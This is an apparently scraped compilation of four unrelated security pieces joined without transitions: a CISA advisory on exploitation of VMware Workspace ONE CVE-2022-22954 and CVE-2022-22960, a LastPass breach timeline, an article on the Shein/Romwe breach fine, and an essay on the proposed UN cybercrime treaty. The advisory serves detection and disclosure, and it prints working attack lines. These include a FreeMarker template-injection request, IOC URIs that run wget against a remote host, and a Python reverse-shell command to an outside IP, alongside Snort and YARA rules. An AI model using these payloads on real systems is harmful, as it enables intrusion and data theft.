Author: rescue@crimefire.in

An official website of the United States government
Here’s how you know
Official websites use .gov
A .gov website belongs to an official government organization in the United States.
Secure .gov websites use HTTPS
A lock () or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.
Search
Update June 2, 2022:
This Cybersecurity Advisory (CSA) has been updated with additional indicators of compromise (IOCs) and detection signatures, as well as tactics, techniques, and procedures (TTPs) from trusted third parties. 
Update End
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this CSA to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). 
VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5, and May 6, 2022, respectively
Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released, Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including IOCs—about observed exploitation at multiple other large organizations from trusted third parties.
This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. 
Update June 2, 2022:
This CSA also provides TTPs of this activity from trusted third parties to assist administrators with detecting and responding to this activity. 
Update End
Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with internet-facing affected systems—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.
Download the PDF version of this report (pdf, 349kb).
For a downloadable copy of IOCs, see AA22-138B.stix. 
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.
According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems. 
Update June 2, 2022:
For more information about this compromised organization, see the Victim 1 section.
Update End
Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell, a publicly available webshell that includes command execution, a file manager, a database manager, and a port scanner. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.
Update June 2, 2022:
The following sections include additional information, including IOCs and TTPs, from trusted third parties about two confirmed compromises. See the appendix for TTPs in this CSA mapped to the MITRE ATT&CK for Enterprise framework.
The trusted third party assesses that multiple threat actors (referred to as Threat Actor 1 [TA1] and Threat Actor 2 [TA2]) gained access to a public-facing server running VMWare Workspace ONE Access. TA1 downloaded a malicious shell script, which they used to collect and exfiltrate sensitive data. TA2 interacted with the server (without automation or scripts) and installed multiple webshells and a reverse secure socket (SOCKS) proxy.
On April 12, TA1 exploited CVE 2022-22954 [T1203] to download [T1105] a malicious shell script [T1059] from https://20.232.97[.]189/up/80b6ae2cea.sh. 
TA1 first targeted Freemarker—a legitimate application that allows for customized notifications by creating templates—to send the following customized GET request URI to the compromised server [T1071.001]:
GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7DHTTP/1.1
The GET request resulted in the server downloading the malicious shell script, 80b6ae2cea[.]sh, to VMware Workspace ONE Access directory /usr/local/horizon/scripts/. TA1 then chained CVE 2022-22960 to the initial exploit to run the shell script with root privileges ([T1068], [TA0004]). The script was executed with the SUDO command.
The script, which contained VMware Workspace ONE Access directory paths and file locations, was developed for data exfiltration [TA0010]. The malicious script collected [TA0009] sensitive files–including user names, passwords, master keys, and firewall rules–and stored them in a “tar ball” (a “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration) [T1560]. The tar ball was located in a VMWare Workspace ONE Access directory: /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/.
The malicious script then deleted evidence of compromise [TA0005] by modifying logs to their original state and deleting files [T1070]. TA1 deleted many files and logs, including fd86ald0.pem,  localhost_access logs, logs associated with the VMWare Horizon application, and greenbox logs for the date of activity (April 12).  
Note: CISA received a similar malicious Bash script for analysis from a trusted third party at a different known compromise. See Victim 2 section for more information.
On April 12, TA1 also downloaded jtest.jsp, a JSP webshell, to the server’s web directory /SAAS/Horizon/js-lib/ from IP address 186.233.187[.]245.
TA1 returned to the server on April 12 to collect sensitive data stored in the “tar ball” by GET request.
On April 13 and 14, TA2 sent many GET requests to the server exploiting—or attempting to exploit—CVE 2022-22954 to obtain RCE, upload binaries, and upload webshells [T1505.003] for persistence [TA0003].
The trusted third party found two copies of the Dingo J-spy webshell (MD5 5b0bfda04a1e0d8dcb02556dc4e56e6a) in web directories: horizon_all.jsp was in the /opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/ web directory and jquery.jsp was in the /webapps/cas/static/ directory. The third party was unable to determine how and when the webshells were created. TA2 used POST requests to communicate with the Dingo J-spy webshells. The commands and output were encrypted with an XOR key [T1573.001].
On April 14, TA2 downloaded a reverse SOCKS proxy [T1090]. TA2 first sent a GET request with the CHMOD command to change the permissions of .tmp12865xax, a hidden file in the /tmp directory [T1222.002]. The actor then downloaded a binary (MD5  dc88c5fe715b5f706f9fb92547da948a) from https://github[.]com/kost/revsocks/releases/download/v1.1.0/revsocks_linux_amd64. The binary is a reverse socks5 tunneling binary with TLS/SSL support and connects to https://149.248.35[.]200.sslip.io.
The trusted third party observed additional threat actor activity that does not seem to be related to TA1 or TA2. On 13 April, IP address 172.94.89[.]112 attempted to connect a reverse shell on the compromised server to IP Address 100.14.239[.]83 on port 5410. The threat actor used the following command:
freemarker.template.utility.Execute"?new()("/usr/bin/python3.7 -c  \'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s. connect((\"100[.]14[.]239[.]83\",5410));os.dup2(s.fileno(),0);  os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"- i\"]);\'")}  
CISA received a related malicious Bash script for analysis from a trusted third party. The analyzed script, deployed on or around April 12, exploits CVE 2022-22960 and allows a Horizon user to escalate privileges and execute commands and scripts as a superuser (sudo). The Bash script also allows the user to collect network information and additional information.
The script overwrites the publishCaCert.hzn script on fd86ald0.pem file and executes commands that compress a list of files containing information such as network interface configuration, list of users, passwords, masterkeys, hosts, and domains to a TAR archive. The TAR archive, located in a VMWare Workspace ONE Access directory, /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/, is assigned read and write permissions to the Horizon web user and read to all users.  
The malicious script deletes evidence of compromise by overwriting publishCaCert.hzn with fd86ald0.pem and then removing fd86ald0.pem.
The trusted third party observed the following IPs downloading, executing, and checking the bash script.
The trusted third party observed the following additional malicious IPs:
Update End
Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.
The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:
alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content: "GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954;
reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)
The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:
10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection";content:"GET"; http_method; content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:;rev:1;)
Update June 2, 2022:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside  Template Injection";content:"GET"; http_method;  content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:100000001;rev:1;)  
Update End
The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:
rule dingo_jspy_webshell
{
strings:
$string1 = "dingo.length"
$string2 = "command = command.trim"
$string3 = "commandAction"
$string4 = "PortScan"
$string5 = "InetAddress.getLocalHost"
$string6 = "DatabaseManager"
$string7 = "ExecuteCommand"
$string8 = "var command = form.command.value"
$string9 = "dingody.iteye.com"
$string10 = "J-Spy ver"
$string11 = "no permission ,die"
$string12 = "int iPort = Integer.parseInt"
condition:
filesize < 50KB and 12 of ($string*)
}
Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.
Update June 2, 2022:
The following third-party YARA rule may detect unmodified instances of the Godzilla webshell on infected hosts:
rule Godzilla_Webshell  
{   
 strings:  
 $string1 = "TomcatListenerMemShellFromThread"  
 $string2 = "String xc ="  
 $string3 = "String pass ="  
 $string4 = "ServletRequestListener"  
 $string5 = "cmds = new String"  
 $string6 = "cmd"  
 $string7 = "bin/bash"  
 $string8 = "getInputStream"  
 $string9 = "javax.crypto.Cipher c = javax.crypto.Cipher.getInstance"  
 $string10 = "godzilla"  
 condition:  
 filesize < 20KB and 10 of ($string*)  
} 
The following third-party YARA rule may detect unmodified instances of the TomCat JSP webshell on infected hosts:
rule Tomcatjsp_Webshell  
{  
 strings:  
 $string1 = "ExecShellCmd"  
 $string2 = "stCommParams"  
 $string3 = "nKeyOffset = EncryptData"  
 $string4 = "InputStream is = process.getInputStream"  
 $string5 = "Process process = Runtime.getRuntime"  
 $string6 = "ExecBinary"  
 $string7 = "byte bzKey"  
 $string8 = "nKeyOffset++"  
 $string9 = "HttpServletRequest request, HttpServletResponse response"   $string10 = "connect_test cmd"  
 $string11 = "exec cmd"  
 $string12 = "file upload"  
 condition:  
 filesize < 25KB and 12 of ($string*)  
} 
 
The following third-party YARA rule may detect unmodified instances of the reverse SOCKS proxy on infected hosts.
rule reversesocks_tool  
{  
 md5 = "dc88c5fe715b5f706f9fb92547da948a"   strings:  
 $string1 = "revsocks"  
 $string2 = "-connect"  
 $string3 = "client:8080 -pass test"  
 $string4 = "RSA TESTING KEY"  
 $string5 = "SETTINGS_MAX_CONCURRENT_STREAMS"   $string6 = "Start on the server:"  
 $string7 = "closing connection"  
 $string8 = "socks 127.0.0.1:1080"  
 $string9 = "revsocks -listen :8080"  
 condition:  
 uint16(0) == 0x457F and filesize < 6MB and 8 of ($string*)  } 
Update End
Administrators should conduct behavioral analysis on root accounts of vulnerable systems by: 
Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960 
Used around April 12–14, 2022 (Updated June 2, 2022)
 
catalog 
portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat  /etc/hosts")} 
/catalog 
portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget  -U "Hello 1.0" -qO - http://[REDACTED]/one")} 
Search for this function in: 
/opt/vmware/horizon/workspace/logs/greenbox_web.log
Update June 2, 2022:
or /opt/vmware/horizon/workspace/logs/greenbox_web.log*
freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands. You should URL decode the logs before searching for freemarker.template.utility.Execute.
horizon.jsp  
June 2, 2022 Update:
(jquery.jsp)
5b0bfda04a1e0d8dcb02556dc4e56e6a (MD 5)
Update End
jspy  
Update June 2, 2022:
C509282c94b504129ac6ef168a3f08a8 (MD 5)
Update End
godzilla 
Update June 2, 2022:
app.jsp 
4cd8366345ad4068feca4d417738b4bd (MD 5)
Update End
 
Update May 25, 2022: see Palo Alto Networks Unit 42 Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) for additional IOCs to detect possible exploitation or compromise. Note: due to the urgency to share this information, CISA has not yet validated this content.
If administrators discover system compromise, CISA recommends they:
CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.
CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870)
[1] VMware Security Advisory VMSA-2022-0011
[2] Ibid
Update June 2, 2022:
Threat actors and their malware have used the TTPs in table 1 when exploiting CVE-2022-22954 and/or CVE-2022-22960 and conducting related activity. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.
Table 2: MITRE ATT&CK TTPs
File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
[T1222.002]
Indicator Removal on Host [T1070]
Archive Collected Data [T1560]
Update End
Initial Version: May 18, 2022|May 25, 2022: Added Industry Resource|June 2, 2022: Added Detection Signatures, IOCs, and TTPs

source

By Michael Hill
UK Editor, CSO |
On November 30, 2022, password manager LastPass informed customers of a cybersecurity incident following unusual activity within a third-party cloud storage service. While LastPass claims that users’ passwords remain safely encrypted, it admitted that certain elements of customers’ information have been exposed. The security incident was the latest to affect the service in recent times in the wake of unauthorized access to its development environment in August last year, serious vulnerabilities in 2017, a phishing attack in 2016, and a data breach in 2015.
Here is a timeline of the most recent LastPass data breaches from August to present.
[Editor’s note: This article, originally published on January 11, 2023, will be updated as new information becomes available.]
LastPass CEO Karim Toubba wrote to inform LastPass users that the company had detected unusual activity within portions of the LastPass development environment. “We have determined that an unauthorized party gained access to portions of the LastPass development environment through a single compromised developer account and took portions of source code and some proprietary LastPass technical information. Our products and services are operating normally.”
In response to the incident, LastPass deployed containment and mitigation measures and engaged a cybersecurity and forensics firm, Toubba added. “While our investigation is ongoing, we have achieved a state of containment, implemented additional enhanced security measures, and see no further evidence of unauthorized activity.”
LastPass announced that it had completed its investigation of the August breach and determined that the attacker did not access any customer data or password vaults. It also confirmed that the access point was a developer’s compromised computer and that the attacker was in the system for a total of four days.
LastPass notified users of a new security incident that its team was investigating. “We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo. We immediately launched an investigation, engaged Mandiant, a leading security firm, and alerted law enforcement,” Toubba wrote.
The company determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain customers’ information, Toubba said, while stating that passwords remained safely encrypted due to LastPass’s Zero Knowledge architecture. “We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional,” he added. Users were advised to follow best practices around the setup and configuration of LastPass.
Yoav Iellin, senior researcher at Silverfort, stated that given the vast number of passwords LastPass protects globally, it remains a big attack target. “The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically it’s best practice after suffering a breach for the organization to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused.”
Iellin urged users to stay vigilant for updates from the company and to take time to verify these were legitimate before taking any action. “In addition, ensuring you have two-factor authentication on any applications with passwords in LastPass and changing passwords will provide the utmost level of security,” Iellin added.
In an update on the investigation, Toubba stated source code and technical information stolen from the LastPass development environment were used to target an employee and obtain credentials/keys, which were used to access and decrypt some storage volumes within a cloud-based storage service. “To date, we have determined that once the cloud storage access key and dual storage container decryption keys were obtained, the threat actor copied information from backup that contained basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass services,” Toubba wrote.
The threat actor was also able to copy a backup of customer vault data from the encrypted storage container, which is stored in a proprietary binary format that contains both unencrypted data, such as website URLs, as well as fully encrypted sensitive fields such as website usernames and passwords, secure notes, and form-filled data, he added. “There is no evidence that any unencrypted credit card data was accessed.”
Toubba warned that the threat actor may attempt to use brute force to guess master passwords and decrypt the copies of vault data they took, but because of the hashing and encryption methods used by LastPass it would be extremely difficult to attempt to brute-force guess master passwords for those customers who follow its password best practices, he continued.
“The threat actor may also target customers with phishing attacks, credential stuffing, or other brute-force attacks against online accounts associated with your LastPass vault.” LastPass added additional logging and alerting capabilities to help detect any further unauthorized activity and is actively rotating all relevant credentials and certificates that may have been affected and supplementing existing endpoint security, Toubba stated. “We are also performing an exhaustive analysis of every account with signs of any suspicious activity within our cloud storage service, adding additional safeguards within this environment, and analyzing all data within this environment to ensure we understand what the threat actor accessed. This remains an ongoing investigation. We have notified law enforcement and relevant regulatory authorities of this incident out of an abundance of caution. In the meantime, our services are running normally, and we continue to operate in a state of heightened alert.”
An anonymous plaintiff filed a class action lawsuit against LastPass relating to the data breaches. “This is a class action for damages against Defendant for its failure to exercise reasonable care in securing and safeguarding highly sensitive consumer data in connection with a massive, months-long data breach,” the lawsuit read. Highly sensitive data was exposed, it continued, impacting potentially millions of LastPass users, resulting in the unauthorized public release and subsequent misuse of their names, end-user names, billing addresses, email addresses, telephone numbers, IP addresses from which customers were accessing the LastPass service, and customer vault data. The lawsuit claimed that LastPass’ “best practices” were woefully insufficient to protect its users’ private information from compromise and misuse.
In an update on the ongoing investigation into the security incident, Paddy Srinivasan, CEO of LastPass parent company GoTo, stated that a threat actor exfiltrated encrypted backups from a third-party cloud storage service related to the following products: Central, Pro, join.me, Hamachi, and RemotelyAnywhere. “We also have evidence that a threat actor exfiltrated an encryption key for a portion of the encrypted backups. The affected information, which varies by product, may include account usernames, salted and hashed passwords, a portion of multi-factor authentication (MFA) settings, as well as some product settings and licensing information. In addition, while Rescue and GoToMyPC encrypted databases were not exfiltrated, MFA settings of a small subset of their customers were impacted,” Srinivasan wrote.
At the time of writing, Srinivasan claimed there was no evidence of exfiltration affecting any other GoTo products other than those referenced or any of GoTo’s production systems. “We are contacting affected customers directly to provide additional information and recommend actionable steps for them to take to further secure their accounts,” Srinivasan added. “Even though all account passwords were salted and hashed in accordance with best practices, out of an abundance of caution, we will also reset the passwords of affected users and/or reauthorize MFA settings where applicable. In addition, we are migrating their accounts onto an enhanced Identity Management Platform, which will provide additional security with more robust authentication and login-based security options.”
A LastPass update on its second breach confirmed that it was related to the initial incident that ended on August 12, 2022. The company claimed that the connection was not obvious because the attacker’s tactics, techniques, and procedures (TTPs) and the indicators of compromies (IOCs) “were not consistent with those of the first [breach].”
The second attack did make use of information exfiltrated during the initial incident: valid credentials of a senior DevOps engineer who had access to a shared cloud storage environment. This made it difficult to identify the attacker’s activity as it appeared to be legitimate. AWS GuardDuty Alerts did notify LastPass of anomalous behavior after the attacker to use cloud identity and access management roles for unauthorized activity.
Michael Hill is the UK editor of CSO Online. He has spent the past five-plus years covering various aspects of the cybersecurity industry, with particular interest in the ever-evolving role of the human-related elements of information security.
Copyright © 2023 IDG Communications, Inc.
Copyright © 2023 IDG Communications, Inc.

source

Zoetop, the holding company behind retailer giant Romwe and Shein, has been fined $1.9m after it failed to properly inform customers of a data breach that reportedly affected millions of users.
According to a notice from New York's attorney general's office this week, the 2018 data breach saw Zoetop failing to secure customers' data, not adequately informing customers of it and trying to keep the real impact of the leak quiet.
The 2018 hack saw credit cards and personal information theft, including names, emails and hashed passwords. The data breach reportedly affected 39 million Shein and seven million Romwe accounts, more than 800,000 of which belonged to New Yorkers.
"Shein and Romwe's weak digital security measures made it easy for hackers to shoplift consumers' personal data," said New York attorney general Letitia James.
"[They] must button up their cybersecurity measures to protect consumers from fraud and identity theft. This agreement should send a clear warning to companies that they must strengthen their digital security measures and be transparent with consumers; anything less will not be tolerated."
More generally, risks connected to an organization not disclosing that it has been breached are substantial, according to Patrick Wragg, cyber incident response manager at Integrity360.
Talking to Infosecurity, the executive said the first type of risk is financial. 
"Not only will the organization suffer from operational issues (disruption to service) and therefore loss of revenue, but if they do not disclose the breach to the likes of the ICO (especially if customer data is stolen), the fines are often exponentially bigger than the threat actor ransom itself," Wragg explained.
Further, companies may suffer reputational and trust risks should they neglect to disclose a data breach.
"If customers find out that their data was stolen and the company tried to hide the fact, then they will be much less likely to use that company in the future due to trust," Wragg said.
"Companies/partners will [also] be less likely to do business with a company that has purposely not disclosed a breach because they don't want to get caught in the 'black hole' of negative reception."
The Zoetop news comes in the wake of a duo of data breaches in Australia that affected subsidiaries of the telecommunication giant Singtel.

source

by Christian Ohanian
October 17, 2022
Budapest (Cybercrime) Convention, cybercrime, Cybersecurity, Diplomacy, hacking, Law enforcement, United Nations
by Christian Ohanian
October 17, 2022
The United Nations is engaged in a landmark effort to establish a new global cybercrime treaty. The goal is laudable. Cybercrime does not respect borders, nor is it limited by them. And, as we have seen, cyberattacks that begin with one target can quickly spill into the broader digital ecosystem, causing widespread damage.  But this initiative at the U.N. – if not carefully curated – could also serve as a vehicle for countries to criminally prosecute security researchers, technology companies, and others for activities that are essential to the overall security of our global digital community.
The estimated economic cost of cyberattacks is staggering and seems to grow each year.  The expansion of the cyber insurance industry is a natural consequence as more companies look to protect themselves against these attacks.  The damage wrought by cybercrime has a nontrivial human component too. When a cyberattack targets the healthcare industry – a common victim – the impact on individual lives is stark : prescriptions don’t get filled, surgeries are delayed, and an individual’s health can rest in the hands of a cybercriminal thousands of miles away and out of reach of local and allied law enforcement agencies. Innovative approaches to combatting cybercrime, including drawing on all elements of geopolitical power, are needed if the international community hopes to put a dent in the seemingly unbounded growth of this malicious enterprise. But while the goal of increased global cooperation in the prosecution of cybercrime is worthwhile, current proposals from various countries, discussed during the summer’s U.N. Ad Hoc Committee’s Second Session, raise concerns.
As it currently stands, the most influential and important international cybercrime treaty is the Council of Europe Convention on Cybercrime, more commonly referred to as the “Budapest Convention.”  That Convention was the first international cybercrime treaty and has been adopted by 67 countries, including Australia, Canada, the Council of Europe (which includes the European Union as well as other countries), Japan, the U.K., and the U.S..  The goal of the Budapest Convention was to establish a global approach to cybercrime that would involve harmonizing national law, improving investigative abilities, and enabling international cooperation.  Among other things, the Budapest Convention defined criminal offenses for cybercrimes such as illegal access to a computer system, fraud and forgery, and illegal data interception.  While the Budapest Convention has been the subject of controversy over the years, including concerns that it undermines individual privacy rights,  it is generally regarded as a useful instrument setting an international standard for addressing cybercrime.
In 2019, the U.N. General Assembly adopted a resolution that initiated a multi-year process of negotiating what could become a global cybercrime treaty more widely adopted and influential than the Budapest Convention.  Negotiations for this treaty are wide-ranging and illustrate a lack of unanimity concerning what should be defined as “cybercrime.” Where some proposed crimes mirror the language and approach of the Budapest Convention, such as prohibitions against illegal access to a computer system, others include new provisions, such as those that criminalize the receipt of “any stolen computer resource.”  The competing proposals also raise the specter of significant human rights concerns with sweeping concepts of criminalized conduct,  especially since the countries driving the movement toward the new treaty are among those with the most restrictive laws concerning the free and open use of the internet.
While human rights concerns are the most significant danger in some of the proposals, they are not the only problem. Most ironically, one of the potential flaws in many of the proposed crimes is that they may undermine the goal of bolstering global cybersecurity. One of the notable ways this concern manifests is in the number of proposals calling for the criminalization of computer-enabled conduct without a requirement to show some kind of “intent.”
Intent is a common element in many global cybercrime legal frameworks – and criminal law, generally. The crimes outlined in the Budapest Convention, Articles 2-11, specify some element of intent as a prerequisite to the criminal prohibitions, such as illegal access, illegal interception, and data interference.  While some of the parties participating in the negotiation of the new U.N. Cybercrime Treaty have proposed cybercrimes that are consistent with the language of the Budapest Convention, many other countries have proposed crimes without any intent element. That’s ill-advised and dangerous. For instance, with respect to the crime of “[c]omputer interference,” Proposal 5 from India states:
Each State party shall adopt such legislative and other measures as are necessary to establish as an offence under its domestic law, if any person without permission of the owner or any other person who is in charge of a computer, computer system or computer network – (d) damages or causes to be damaged any computer, computer system or computer network, data, computer data base or any other programmes residing in such computer, computer system or computer network…
Another example is Egypt’s Proposal 1 for an offense relating to “[a]ttack on a site design,” which states:
Each State party shall also adopt such legislative and other measures as are necessary to criminalize the following acts:
The unlawful damaging, disruption, slowing, distortion, concealment or modification of the site design of a company, institution, establishment or natural person.
Where many proposals omit intent, other countries seek to maintain it as an important element of the proposed crimes in the new treaty. For instance, Canada’s Proposal 3 for an offense relating to “data interference” states that countries shall:
Establish as a criminal offence to, intentionally and without right, seriously hinder the functioning of a computer system by inputting, transmitting, damaging, deleting, deteriorating, altering, or suppressing computer data.
When intent is removed from a criminal prohibition, it increases the likelihood that innocent individuals who inadvertently produce certain effects from their conduct will be subjected to the full weight of criminal prosecution and the threat of significant penalties, including, potentially the loss of their freedom. This is a danger that is well-recognized in the field of cybersecurity.  To be sure, security research does not always involve activities that might implicate cybercrime laws as such research does not necessarily involve conduct that might constitute “interfering” with a system or circumventing security measures. Omitting intent as an element of a cybercrime may, however, criminalize such conduct, in those circumstances when the effects of cybersecurity research are less clear.
By maintaining the intent element in cybercrime laws, many jurisdictions can avoid the risk of discouraging or chilling the activities of security researchers such that those researchers, who are legitimately acting in good faith, should generally not worry about being prosecuted for inadvertent effects for which different parties might debate whether they constitute “accessing” or “interfering” with a system. There should be no room for ambiguity.
Through its enforcement of the Computer Fraud and Abuse Act (CFAA), the United States itself has struggled to reconcile the line between legitimate computer research and criminal access to a computer system.  In particular, in the case of vulnerability research, some identification and testing of vulnerabilities could potentially, if inadvertently, cause effects that some might argue constitute “interfering” with a computer system in violation of the CFAA.  This has left many critics claiming that vital cybersecurity research, including vulnerability research, is threatened unnecessarily by the specter of potential federal criminal prosecution.  Many technology companies that offer cybersecurity services or products, as well as corporate security departments, depend on the ability to obtain and use actionable intelligence concerning cybersecurity vulnerabilities to protect their systems, the many consumers they serve, and the broader cybersecurity ecosystem. The importance of insulating “good faith” security researchers from cybercrime laws was recognized recently by the U.S. Department of Justice, which announced a new policy for federal prosecutors investigating potential violations of the CFAA.   That policy explicitly discourages prosecutors from pursuing “good faith” security researchers for violations of the law.
To the extent any of the current cybercrime proposals that do not require intent survive in the final version of the U.N. Cybercrime Treaty, it could significantly alter the landscape for cybersecurity researchers, discouraging their work and even potentially threatening them with criminal prosecution.
A new global cybercrime treaty, especially one that aspires to something closer to universal adoption in countries that are not parties to the Budapest Convention, could have significant positive effects on the fight against global cybercrime. An instrument that enables more extensive international cooperation in cybercrime investigations could mean, among other things, more favorable conditions for the extradition of cybercriminals from countries currently unwilling to do so. It could also shrink the number of “friendly” jurisdictions where cybercriminals can act with relative impunity. But when significant human rights concerns are coupled with blind spots that could endanger cybersecurity research, it is apparent that an international instrument that is not carefully crafted could have unintended consequences, including undermining the very purpose for its existence.
 
Budapest (Cybercrime) Convention, cybercrime, Cybersecurity, Diplomacy, hacking, Law enforcement, United Nations
All-source, public repository of congressional hearing transcripts, government agency documents, digital forensics, social media analysis, public opinion surveys, empirical research, more.
by Oleksandra Matviichuk, Natalia Arno and Jasmine D. Cameron
Mar 3rd, 2023
by W. Casey Biggerstaff
Mar 2nd, 2023
by John Erath
Mar 1st, 2023
by Inga Imanbay
Feb 28th, 2023
by Mary B. McCord and Jacob Glick
Feb 27th, 2023
by Mark Malloch-Brown
Feb 24th, 2023
by Darryl Robinson
Feb 23rd, 2023
by Luis Moreno Ocampo
Feb 23rd, 2023
by Ukrainian MP Kira Rudik
Feb 22nd, 2023
by Ukrainian MP Oleksiy Goncharenko
Feb 22nd, 2023
by Andy Wright and Ryan Goodman
Feb 21st, 2023
by Mark Nevitt
Feb 21st, 2023
by Ambassador David Scheffer and Kristin Smith
Feb 17th, 2023
by Sophia Yan
Feb 15th, 2023
by Clara Apt
Feb 14th, 2023
by Elizabeth Goitein
Feb 13th, 2023
by Chile Eboe-Osuji
Feb 10th, 2023
by Linda Bishai and Laura R. Cleary
Feb 9th, 2023
by Scott Roehm
Feb 8th, 2023
by Norman L. Eisen, E. Danya Perry and Fred Wertheimer
Feb 7th, 2023
by Ryan Goodman
Feb 7th, 2023
by Rebecca Hamilton and Rosa Curling
Feb 6th, 2023
by Luis Moreno Ocampo
Jan 31st, 2023
by Brian Finucane and Luke Hartig
Jan 30th, 2023
by Douglas London
Jan 27th, 2023
by Eileen B. Hershenov and Ryan B. Greer
Jan 26th, 2023
by Menachem Z. Rosensaft
Jan 25th, 2023
by Jasmine D. Cameron
Jan 24th, 2023
by Ryan Goodman and Clara Apt
Jan 19th, 2023
by Kate Donald and Anne-Marea Griffin
Jan 19th, 2023
by Ryan Goodman, Justin Hendrix and Norman L. Eisen
Jan 17th, 2023
by Marieke de Hoon
Jan 13th, 2023
by Andy Wright
